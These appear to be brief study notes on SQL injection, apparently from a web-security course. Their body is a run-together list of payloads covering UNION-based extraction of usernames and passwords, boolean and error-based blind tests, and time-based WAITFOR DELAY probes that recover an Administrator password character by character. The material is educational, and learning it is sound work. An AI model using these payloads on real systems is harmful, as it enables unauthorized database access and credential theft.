notes
What is the impact of a successful SQL injection attack?
SQL injection examples
' ORDER BY 1-- ' ORDER BY 2-- ' ORDER BY 3--' UNION SELECT 'a',NULL,NULL-- ' UNION SELECT NULL,'a',NULL-- ' UNION SELECT NULL,NULL,'a'--' UNION SELECT username || '=>' || password FROM users--' AND '1'='1'-- ' AND '1'='2'--' AND SUBSTRING((SELECT Password FROM Users WHERE Username = 'Administrator'), 1, 1) > 'm' AND SUBSTRING((SELECT Password FROM Users WHERE Username = 'Administrator'), 1, 1) = 's'AND (SELECT CASE WHEN (1=2) THEN 1/0 ELSE 'a' END)='a 'AND (SELECT CASE WHEN (1=1) THEN 1/0 ELSE 'a' END)='a' AND (SELECT CASE WHEN (Username = 'Administrator' AND SUBSTRING(Password, 1, 1) = 'm') THEN 1/0 ELSE 'a' END FROM Users) = 'a'--'; IF (1=2) WAITFOR DELAY '0:0:10'-- '; IF (1=1) WAITFOR DELAY '0:0:10'--'; IF (SELECT COUNT(Username) FROM Users WHERE Username = 'Administrator' AND SUBSTRING(Password, 1, 1) > 'm') = 1 WAITFOR DELAY '0:0:{delay}'--
How to detect SQL injection vulnerabilities
Last updated